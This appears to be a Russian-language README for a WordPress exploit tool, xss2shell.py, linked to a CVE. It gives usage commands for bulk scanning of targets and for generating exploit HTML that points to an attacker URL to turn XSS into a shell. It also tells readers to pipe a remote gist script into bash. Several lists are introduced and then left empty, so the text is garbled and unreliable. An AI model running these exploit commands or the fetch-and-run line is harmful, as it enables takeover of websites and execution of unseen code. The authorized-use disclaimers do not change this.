
CVE-2026-64638 - Черновик или TODO
Поддержите разработку этого проекта через PayPal или отсканировав QR-код ниже.
Используйте этот проект только в безопасных и авторизованных средах, таких как:
Пример настройки:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Пример использования:
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:
# Scan a single URL
python xss2shell.py scan http://wp-vm.local
# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt
# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json
# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local
# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/
# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator
Примечание:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y для очистки вложенного каталога .gitРепозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.
Этот репозиторий предназначен только для образовательных и авторизованных исследований в области безопасности.
Он создан, чтобы помочь пользователям узнать о:
Используйте этот репозиторий только в средах, где у вас есть разрешение, например:
Несанкционированное или незаконное использование строго запрещено.
Автор и соавторы не несут ответственности за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.
Используя этот репозиторий, вы соглашаетесь с тем, что:
Этот проект предназначен для:
Пожалуйста, следуйте практике ответственного раскрытия информации и соблюдайте все применимые законы.
Для ответственного раскрытия информации или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.